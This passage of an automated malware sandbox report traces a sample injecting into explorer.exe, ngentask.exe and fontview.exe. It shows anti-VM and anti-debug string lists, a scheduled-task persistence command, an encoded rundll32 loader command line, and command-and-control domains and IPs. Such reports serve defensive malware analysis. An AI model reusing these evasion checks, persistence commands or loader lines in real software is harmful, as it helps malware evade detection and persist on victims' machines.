bovoj.exevboxservice.exeVGAuthService.exevmtoolsd.exeprl_cc.exeHTTPDebuggerUI.exeHttpAnalyzerStdV7.exePROCEXP64.exe9vcQbULrEEOHDRqecloudsafelineyq7T94qzPuDeOrTe80urpbYHQ3908aPeycDDggZJIPRjtkOe8J4Wdllbx1ApOW9evbZ1uo2T2UbMGtUdBSQDYJSbaLF5CgvcsFImbSiBECUOLzpcIk2VP28ir0vTy4TbDYVLfRsd5XNE93cYiigvV5kbWQ4w2roU3OQVpirDLVGrVmVTmqRp5j7SuNTW6WJSccDmayghiNoZWAXRSZKcI5fN6d9y9HJRZHIX2jJ5ndQDFLbQ7Gsn9COrx41kruaQxiHNEOIqB1voNhHQfpG6n3LiJpAEsKGQbMh2wfPZkMIH3jpNw2wwL4qOww0SAvLN7QPqaculbYlOPumLDjFmGrxyrkqKoVNJkrD4pQP2PQ8FNc7JabGGRSw4W0K7VSsICQYE9Jt8N0nVh1MITQsnOGZQBxmijylHv2DLczJ486OVC7eHTPLwz4Nt1Dg4jsqGyzCqbMr6MBLZrXjGOxTXcYoA7fBPn0eGH7Ex8dg8NsycsAOGd5g0Nv7r0LVA09KGcaWtJO5Tb2I2LhAGZrMz4T0Epaso079GslJNUY5E4dliUTNFlXFuZSNaEVRrIGWChIYUgq9hHpqOdBLBiAQmME3ZwAAGkEJB4gPxySrtR5EFN43BbtxiTk2KKfog8JcArlOy8gS3rrvRRJNAUFJSzgakwzM2deQ8oCWpzq6o4rIWMrY77FlbkvUsfeYwtpb6Y2CToyPqlwYaqay5DndXG1BsVppP4Jq5WxP1Oq3y3dHBZrc5X4kw1cn7yJdb9J450JE0s2Rdql7gxWP4zkmA4WMYvM2YZr24zUIl8P9x5RU6f5F2Hm4yAEQ4STv1pKj0
Source: 2560.exe, 00000011.00000003.362777696.00000000007EA000.00000004.00000020.00020000.00000000.sdmp, 2560.exe, 00000011.00000002.364169041.00000000007EA000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000002.467740836.0000000003649000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000001.00000000.275078678.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: fontview.exe, 00000013.00000002.467467655.00000000035B0000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: VMWARE
Source: fontview.exe, 00000013.00000002.467740836.0000000003649000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HMicrosoft-Windows-Hyper-V-Hypervisor-
Source: fontview.exe, 00000013.00000002.468130590.0000000004F00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinke5d05f0c9f}SymbolicLink
Source: explorer.exe, 00000001.00000000.275078678.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
Source: explorer.exe, 00000001.00000000.268540188.0000000005063000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
Source: fontview.exe, 00000013.00000002.468130590.0000000004F00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkymbolicLinkSymbolicLink
Source: ngentask.exe, 00000012.00000002.457360709.00000000017A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: explorer.exe, 00000001.00000000.275078678.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
Source: 226F.exe, 00000010.00000002.479576664.000000000168A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll9
Source: fontview.exe, 00000013.00000003.444938250.000000000368E000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.445080033.0000000003695000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Microsoft-Windows-Hyper-V-Hypervisor
Source: fontview.exe, 00000013.00000002.468130590.0000000004F00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkymbolicLink0c9f}SymbolicLink?
Source: fontview.exe, 00000013.00000003.383001700.0000000003666000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WQLrandomRandom name%ThisIsAnInvalidFileName?[]<>@\;!-{}#:/~%%ThisIsAnInvalidEnvironmentVariableName?[]<>@\;!-{}#:/~%cmdvrt32.dllcmdvrt64.dllwpespy.dllvmcheck.dllpstorec.dlldir_watch.dllapi_log.dlldbghelp.dllsbiedll.dllsnxhk.dllavghooka.dllavghookx.dlltestapp.exemyapp.exeklavme.exetest.exemalware.exesandbox.exebot.exesample.exeJohn Doevirustest usermaltestmalwaresand boxusertimmyPeter WilsonmilozsMillerJohnsonIT-ADMINHong LeeHAPUBWSEmilySandboxCurrentUserTEQUILABOOMBOOMFORTINETWIN7-TRAPSMUELLER-PCJOHN-PCHANSPETER-PC7SILVIASANDBOXC:\a\foobar.gifC:\a\foobar.docC:\a\foobar.bmpC:\123\email.docxC:\123\email.docC:\email.htmC:\email.docC:\loaddll.exeC:\take_screenshot.ps1JohnKLONE_X64-PCSystemITadminSWSCWilberNumberOfCoresSELECT * FROM Win32_ProcessorvirtualqemuvmwarevboxVBoxVBoxVBoxParallels Hvprl hyperv XenVMMXenVMMVMwareVMwareMicrosoft HvKVMKVMKVMA M IVirtualXen0ParallelsVMWareSerialNumberSELECT * FROM Win32_BIOSHVM domUVirtualBoxModelSELECT * FROM Win32_ComputerSystemQEMUinnotek GmbHManufacturerProcessorIdVMWxenvirtioSystem\CurrentControlSet\Enum\SCSISystem\CurrentControlSet\Enum\IDESELECT * FROM CIM_PhysicalConnector06/23/99SystemBiosDateVIRTUALBOXVideoBiosVersionSystemBiosVersionIdentifierHARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0HARDWARE\Description\SystemVBOXSYSTEM\ControlSet001\Services\VBoxVideoSYSTEM\ControlSet001\Services\VBoxSFSYSTEM\ControlSet001\Services\VBoxServiceSYSTEM\ControlSet001\Services\VBoxMouseSYSTEM\ControlSet001\Services\VBoxGuestSOFTWARE\Oracle\VirtualBox Guest AdditionsHARDWARE\ACPI\RSDT\VBOX__HARDWARE\ACPI\FADT\VBOX__HARDWARE\ACPI\DSDT\VBOX__System32\VBoxControl.exeSystem32\vboxtray.exeSystem32\vboxservice.exeSystem32\vboxoglpassthroughspu.dllSystem32\vboxoglpackspu.dllSystem32\vboxoglfeedbackspu.dllSystem32\vboxoglerrorspu.dllSystem32\vboxoglcrutil.dllSystem32\vboxoglarrayspu.dllSystem32\vboxogl.dllSystem32\vboxmrxnp.dllSystem32\vboxhook.dllSystem32\vboxdisp.dllSystem32\drivers\VBoxVideo.sysSystem32\drivers\VBoxSF.sysSystem32\drivers\VBoxGuest.sysSystem32\drivers\VBoxMouse.sys%ProgramW6432%\\.\pipe\VBoxTrayIPC\\.\VBoxTrayIPC\\.\pipe\VBoxMiniRdDN\\.\VBoxGuest\\.\VBoxMiniRdrDNVBoxTrayToolWndVBoxTrayToolWndClassVirtualBox Shared Foldersvboxtray.exevboxservice.exePCI\VEN_80EE&DEV_CAFEDeviceIdSELECT * FROM Win32_PnPEntityOpenHCD82371SB82441FX82801FBNameVEN_VBOXPNPDeviceIDCaptionSELECT * FROM Win32_PnPDevicePNP_BUS_0PCI_BUS_0ACPIBus_BUS_0SELECT * FROM Win32_BusOracle CorporationProductSELECT * FROM Win32_BaseBoardSourcesSystemFileNameSELECT * FROM Win32_NTEventlogFileVBoxWddmVBoxVideoW8vboxvideoVBOXvboxVirtualBoxSystemProductNameSystemManufacturerHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0SYSTEM\ControlSet001\Control\SystemInformationVMWARESOFTWARE\VMware, Inc.\VMware Toolsvmacthlp.exeVGAuthService.exevmwareuser.exevmwaretray.exevmtoolsd.exeVMwareVMWAREvdservice.exevdagent.exeqemu-ga.e
Source: fontview.exe, 00000013.00000003.387503810.00000000055A0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: DisableGuestVmNetworkConnectivity
Source: fontview.exe, 00000013.00000002.467467655.00000000035B0000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: fontview.exe, 00000013.00000002.467716814.0000000003647000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\Program Files (x86)\qemu-gag
Source: explorer.exe, 00000001.00000000.270686003.0000000007166000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: fontview.exe, 00000013.00000003.445080033.0000000003695000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: amdxataApplication Management Group PolicyApplication PopupAppReadinessarcsasAsyncMacatapib06bdrvBasicRenderbeepBugCheckcdromcht4iscsicht4vbdDCOMDfsSvcDhcpDhcpv6diskDisplayDnsapiDnscachee1iexpressebdrveventlogexFATFltMgrfvevolHidBthhidi2cHpSAMDHttpi8042prtiaStorAVCiaStorVibbusIntel-iaLPSS-GPIOIntel-iaLPSS-I2CIntel-iaLPSS2-GPIO2Intel-iaLPSS2-I2CintelppmIPMGMIPMIDRVIPNATHLPIPRouterManagerireventsisapnpiScsiPrtItSas35ikbdclasskbdhidkdnicKerberosLfsvclltdioLmHostsLsaSrvLSI_SASLSI_SAS2iLSI_SAS3iLSI_SSSLSMmegasasmegasas2imegasas35imegasrMicrosoft-Windows-Audit-CVEMicrosoft-Windows-BitLocker-APIMicrosoft-Windows-BitLocker-DriverMicrosoft-Windows-Bits-ClientMicrosoft-Windows-Bluetooth-BthLEPrepairingMicrosoft-Windows-CoreSystem-InitMachineConfigMicrosoft-Windows-CoreSystem-NetProvision-JoinProviderOnlineMicrosoft-Windows-CorruptedFileRecovery-ClientMicrosoft-Windows-CorruptedFileRecovery-ServerMicrosoft-Windows-Devices-BackgroundMicrosoft-Windows-DfsSvcMicrosoft-Windows-Dhcp-ClientMicrosoft-Windows-DHCPv6-ClientMicrosoft-Windows-Diagnostics-NetworkingMicrosoft-Windows-Directory-Services-SAMMicrosoft-Windows-DiskDiagnosticMicrosoft-Windows-DistributedCOMMicrosoft-Windows-DNS-ClientMicrosoft-Windows-DriverFrameworks-UserModeMicrosoft-Windows-EnhancedStorage-EhStorTcgDrvMicrosoft-Windows-EventCollectorMicrosoft-Windows-EventlogMicrosoft-Windows-exFAT-SQMMicrosoft-Windows-Fat-SQMMicrosoft-Windows-Fault-Tolerant-HeapMicrosoft-Windows-FilterManagerMicrosoft-Windows-FirewallMicrosoft-Windows-FMSMicrosoft-Windows-FunctionDiscoveryHostMicrosoft-Windows-GPIO-ClassExtensionMicrosoft-Windows-GroupPolicyMicrosoft-Windows-HALMicrosoft-Windows-HttpEventMicrosoft-Windows-Hyper-V-HypervisorMicrosoft-Windows-IphlpsvcMicrosoft-Windows-IsolatedUserModeMicrosoft-Windows-Kernel-BootMicrosoft-Windows-Kernel-GeneralMicrosoft-Windows-Kernel-Interrupt-SteeringMicrosoft-Windows-Kernel-IOMicrosoft-Windows-Kernel-PnPMicrosoft-Windows-Kernel-PowerMicrosoft-Windows-Kernel-Processor-PowerMicrosoft-Windows-Kernel-TmMicrosoft-Windows-Kernel-WHEAMicrosoft-Windows-Kernel-XDVMicrosoft-Windows-LanguagePackSetupMicrosoft-Windows-Memory-Diagnostic-Task-HandlerMicrosoft-Windows-MemoryDiagnostics-ResultsMicrosoft-Windows-MemoryDiagnostics-ScheduleMicrosoft-Windows-MountMgrMicrosoft-Windows-NDISMicrosoft-Windows-NdisImPlatformSysEvtProviderMicrosoft-Windows-NetworkBridgeMicrosoft-Windows-NtfsMicrosoft-Windows-Ntfs-UBPMMicrosoft-Windows-OfflineFilesMicrosoft-Windows-OverlayFilterMicrosoft-Windows-PersistentMemory-NvdimmMicrosoft-Windows-PersistentMemory-PmemDiskMicrosoft-Windows-Power-Meter-PollingMicrosoft-Windows-Power-TroubleshooterMicrosoft-Windows-ReFSMicrosoft-Windows-ReFS-v1Microsoft-Windows-ResetEngMicrosoft-Windows-Resource-Exhaustion-DetectorMicrosoft-Windows-ResourcePublicationMicrosoft-Windows-SCPNPMicrosoft-Windows-Serial-ClassExtensionMicrosoft-Windows-Serial-ClassExtension-V2Microsoft-Windows-ServicingMicrosoft-Windows-SetupMicrosoft-Windows-SetupPlatformMicrosoft-Windows-SPB-ClassE
Source: explorer.exe, 00000001.00000000.275078678.0000000008FE9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
Source: fontview.exe, 00000013.00000003.387503810.00000000055A0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: EnableGuestVmNetworkConnectivity
Source: explorer.exe, 00000001.00000000.275078678.0000000008FE9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

Source: C:\Windows\explorer.exe

Process information queried: ProcessInformation

Source: C:\Users\user\AppData\Local\Temp\336E.exe

Code function: 14_2_00428390 FindFirstFileExW,

Anti Debugging

Hides threads from debuggers

Source: C:\Windows\SysWOW64\fontview.exe	Thread information set: HideFromDebugger
Source: C:\Windows\SysWOW64\fontview.exe	Thread information set: HideFromDebugger
Source: C:\Windows\SysWOW64\fontview.exe	Thread information set: HideFromDebugger

Source: C:\Users\user\Desktop\aw9Ynwqd1x.exe	Code function: 0_2_02BF0D90 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\aw9Ynwqd1x.exe	Code function: 0_2_02BF092B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\dbjigst	Code function: 13_2_02C30D90 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\dbjigst	Code function: 13_2_02C3092B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\336E.exe	Code function: 14_2_0041E1B1 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\336E.exe	Code function: 14_2_0042950B mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\AppData\Local\Temp\226F.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\fontview.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\fontview.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\fontview.exe	Process queried: DebugFlags
Source: C:\Windows\SysWOW64\fontview.exe	Process queried: DebugObjectHandle
Source: C:\Windows\SysWOW64\fontview.exe	Process queried: DebugObjectHandle
Source: C:\Windows\SysWOW64\fontview.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\Library.exe	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\336E.exe

Code function: 14_2_00413DCA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

Source: C:\Users\user\AppData\Local\Temp\336E.exe

Code function: 14_2_0042BCAF GetProcessHeap,

Source: C:\Windows\SysWOW64\fontview.exe

System information queried: KernelDebuggerInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe

Memory allocated: page read and write | page guard

Source: C:\Users\user\AppData\Local\Temp\336E.exe	Code function: 14_2_00414035 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\336E.exe	Code function: 14_2_00413DCA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\336E.exe	Code function: 14_2_00417E53 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\336E.exe	Code function: 14_2_00413F2C SetUnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: potunulit.org
Source: C:\Windows\explorer.exe	Network Connect: 188.114.97.3 80
Source: C:\Windows\System32\rundll32.exe	Network Connect: 109.206.243.168 80
Source: C:\Windows\System32\dllhost.exe	Domain query: transfer.sh

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: dbjigst.1.dr

Jump to dropped file

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\aw9Ynwqd1x.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\Desktop\aw9Ynwqd1x.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Roaming\dbjigst	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Roaming\dbjigst	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Windows\System32\rundll32.exe	Section loaded: unknown target: C:\Windows\System32\dllhost.exe protection: execute and read and write

Encrypted powershell cmdline option found

Source: C:\Users\user\AppData\Local\Temp\Library.exe	Process created: Base64 decoded start-sleep -seconds 90
Source: C:\Users\user\AppData\Local\Temp\Library.exe	Process created: Base64 decoded start-sleep -seconds 90

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\226F.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000 protect: page read and write
Source: C:\Users\user\AppData\Local\Temp\226F.exe	Memory allocated: C:\Windows\SysWOW64\fontview.exe base: 3290000 protect: page read and write

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\2560.exe	Memory written: C:\Users\user\AppData\Local\Temp\2560.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\226F.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\226F.exe	Memory written: C:\Windows\SysWOW64\fontview.exe base: 3290000 value starts with: 4D5A

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\aw9Ynwqd1x.exe	Thread created: C:\Windows\explorer.exe EIP: 3491B14
Source: C:\Users\user\AppData\Roaming\dbjigst	Thread created: unknown EIP: 5851B14

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\226F.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\226F.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 10EE008
Source: C:\Users\user\AppData\Local\Temp\226F.exe	Memory written: C:\Windows\SysWOW64\fontview.exe base: 3290000

.NET source code references suspicious native API functions

Source: 16.3.226F.exe.d030000.1.unpack, MemoryImport.cs	Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibraryA@kernel32.dll')
Source: 16.3.226F.exe.d030000.0.unpack, MemoryImport.cs	Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibraryA@kernel32.dll')
Source: 18.2.ngentask.exe.400000.0.unpack, MemoryImport.cs	Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibraryA@kernel32.dll')
Source: Library.exe.25.dr, ue067.cs	Reference to suspicious API methods: ('?', 'GetProcAddress@kernel32.dll'), ('?', 'LoadLibrary@kernel32.dll')

Queues an APC in another process (thread injection)

Source: C:\Windows\System32\rundll32.exe

Thread APC queued: target process: C:\Windows\System32\dllhost.exe

Source: C:\Windows\SysWOW64\fontview.exe	Process created: C:\Windows\System32\rundll32.exe "c:\users\user\appdata\roaming\nsis_uns5aa2a3.dll",printuientry \|5cqkohmaaaa\|1tkr5gsmwyd\|67sdqg8oaal\|xymwxc0tnso\|1k8b3tzkgiyf2sazqbyag4xap9sadmamgauakvkhwbs8\|atbqpz8fp\|afoaeqbpagl7aeenaemaaaa3\|wbvaesazwbj\|i0cwuid7cjobp8caabig8qow\|\|mzmxmiuqkgp9iivqkeeijtpskcf0bsitejdbvsikejieboehval8ismdejbataet9doebeeidwagpad0qgqfasdmwahml\|p8diwwksapisf+lwuiltksbvhsa\|wprsivkigmi9wjrwwyfzuilbpslyppwm8lii1d\|geg70xq2sip\|wibiiwjio8l\|dcpmg3highx\|gkylqfbmqypvogt0bxers3ui\|heqebaudavii78a69vii0j9amh+agbau1vwv0fuv0fvqvzbv10bzv+bou1atyv4tp+l8kil2q+f\|p7z8exjstxbgtz\|cvbfaaapheq+8\|bbi4qjippwhf\|asi08aq+e1t5qeyo8cywtaq+e\|cfz8eslzybei\|9fhit3jeslt\|8ytaphtapzsp8d8tpjryxjd\|uepppwtyveqyv\|eeuz0kgd04r\|aotadb1bwcrvdq++wpoaauqd\|dc\|exxsqyh6qv\|8dxx0dopbaf9jg8aeqtvjc\|9p68alwq+3dp9oryssi0wd6+90wdptqhb0uuh7ixtbanmzyyocf0ylwuspwcniexsdyouqaugkanuq\|+0zwdp2qtsm+bbgekyag8ybg\|j\|chlu6wpii8v\|qf\|vsyke94p9xeqqxaq7bxhy\|a9mauffqv5bxb9bxf9exvszf0jvgexgawqai+no\|2b+\|\|9ihcapw4sydsbmja8biysq38gz\|+ibfscnx\|8eti1frjpsi9\|l\|1qkaiagtiuv4a+ea3ugragqm\|fai9orieijfct1ikygciagsivwd\|oes3ugpibqsi1w\|whejudasi2m\|ssfeuil2oh8\|a5+ii1wsn4geoihzpbz8ohn7ybeiwan01ciqscmifjkiymeaysahxle8\|cldtogj1ijjcrxeqcwksdo7thviiucltjmi12\|okid+2xiiiaw\|0yjzcq4tiuk7hoytilchagejny2hxggko0rjudlmiz7jpdz8eml1ojp7fwfmiqcedjijyt+edjbgpmhju9s90qwgkqcg+kbdffzgbx4mifszxi\|du2lhct0ijgu+yt4nqhcsdvycv84g\|psdjnejxtjqpoaleg4ajgaeqygqmoi+hqzrlywvsaxsy1ujgyrienfg+hs6gucmeil\|c6mihhihf90es+lvujmjjabmuin\|0wkqp\|xsiheahqhysqtcc0b
Source: C:\Windows\SysWOW64\fontview.exe	Process created: C:\Windows\System32\rundll32.exe "c:\users\user\appdata\roaming\nsis_uns5aa2a3.dll",printuientry \|5cqkohmaaaa\|1tkr5gsmwyd\|67sdqg8oaal\|xymwxc0tnso\|1k8b3tzkgiyf2sazqbyag4xap9sadmamgauakvkhwbs8\|atbqpz8fp\|afoaeqbpagl7aeenaemaaaa3\|wbvaesazwbj\|i0cwuid7cjobp8caabig8qow\|\|mzmxmiuqkgp9iivqkeeijtpskcf0bsitejdbvsikejieboehval8ismdejbataet9doebeeidwagpad0qgqfasdmwahml\|p8diwwksapisf+lwuiltksbvhsa\|wprsivkigmi9wjrwwyfzuilbpslyppwm8lii1d\|geg70xq2sip\|wibiiwjio8l\|dcpmg3highx\|gkylqfbmqypvogt0bxers3ui\|heqebaudavii78a69vii0j9amh+agbau1vwv0fuv0fvqvzbv10bzv+bou1atyv4tp+l8kil2q+f\|p7z8exjstxbgtz\|cvbfaaapheq+8\|bbi4qjippwhf\|asi08aq+e1t5qeyo8cywtaq+e\|cfz8eslzybei\|9fhit3jeslt\|8ytaphtapzsp8d8tpjryxjd\|uepppwtyveqyv\|eeuz0kgd04r\|aotadb1bwcrvdq++wpoaauqd\|dc\|exxsqyh6qv\|8dxx0dopbaf9jg8aeqtvjc\|9p68alwq+3dp9oryssi0wd6+90wdptqhb0uuh7ixtbanmzyyocf0ylwuspwcniexsdyouqaugkanuq\|+0zwdp2qtsm+bbgekyag8ybg\|j\|chlu6wpii8v\|qf\|vsyke94p9xeqqxaq7bxhy\|a9mauffqv5bxb9bxf9exvszf0jvgexgawqai+no\|2b+\|\|9ihcapw4sydsbmja8biysq38gz\|+ibfscnx\|8eti1frjpsi9\|l\|1qkaiagtiuv4a+ea3ugragqm\|fai9orieijfct1ikygciagsivwd\|oes3ugpibqsi1w\|whejudasi2m\|ssfeuil2oh8\|a5+ii1wsn4geoihzpbz8ohn7ybeiwan01ciqscmifjkiymeaysahxle8\|cldtogj1ijjcrxeqcwksdo7thviiucltjmi12\|okid+2xiiiaw\|0yjzcq4tiuk7hoytilchagejny2hxggko0rjudlmiz7jpdz8eml1ojp7fwfmiqcedjijyt+edjbgpmhju9s90qwgkqcg+kbdffzgbx4mifszxi\|du2lhct0ijgu+yt4nqhcsdvycv84g\|psdjnejxtjqpoaleg4ajgaeqygqmoi+hqzrlywvsaxsy1ujgyrienfg+hs6gucmeil\|c6mihhihf90es+lvujmjjabmuin\|0wkqp\|xsiheahqhysqtcc0b

Source: C:\Users\user\AppData\Local\Temp\336E.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
Source: C:\Users\user\AppData\Local\Temp\2560.exe	Process created: C:\Users\user\AppData\Local\Temp\2560.exe C:\Users\user\AppData\Local\Temp\2560.exe
Source: C:\Users\user\AppData\Local\Temp\226F.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
Source: C:\Users\user\AppData\Local\Temp\226F.exe	Process created: C:\Windows\SysWOW64\fontview.exe C:\Windows\SYSWOW64\fontview.exe
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\dllhost.exe
Source: C:\Windows\System32\dllhost.exe	Process created: C:\Users\user\AppData\Local\Temp\Library.exe "C:\Users\user\AppData\Local\Temp\Library.exe"
Source: C:\Users\user\AppData\Local\Temp\Library.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAOQAwAA==

Source: explorer.exe, 00000001.00000000.267939232.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program ManagerT7<=ge
Source: fontview.exe, 00000013.00000003.416675694.0000000005B80000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.414492613.00000000055B2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TargetundeleteSoftware\Microsoft\Tracking\TimeOut::{9db1186e-40df-11d1-aa8c-00c04fb67863}:Shell_TrayWnd
Source: fontview.exe, 00000013.00000003.412196998.0000000006930000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.410010255.00000000055B1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ShellFileViewFolderExploreFolderConfirmCabinetIDDeleteGroupDeleteItemReplaceItemReloadFindFolderOpenFindFileCreateGroupShowGroupAddItemExitProgman[RN
Source: fontview.exe, 00000013.00000003.412196998.0000000006930000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.410010255.00000000055B1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %c:\%sExplorerDMGFrameGroupssetupPmFrameGetIconGetDescriptionGetWorkingDirSoftware\Microsoft\Windows\CurrentVersion\Explorer\MapGroupsSenderCA_DDECLASSInstallMake Program Manager GroupStartUpccInsDDEBWWFrameDDEClientWndClassBACKSCAPEMediaRecorderMedia Recorder#32770DDEClientddeClassgroups
Source: fontview.exe, 00000013.00000003.401675563.0000000005000000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000001.00000000.267939232.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.270172143.0000000006770000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.275078678.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: fontview.exe, 00000013.00000003.400623587.00000000055B0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.400263237.0000000005084000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: GetProgmanWindow
Source: explorer.exe, 00000001.00000000.267939232.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: rundll32.exe, 00000018.00000003.490751661.000002275D660000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: WindowOverrideScaleFactorShell_TrayWnd[
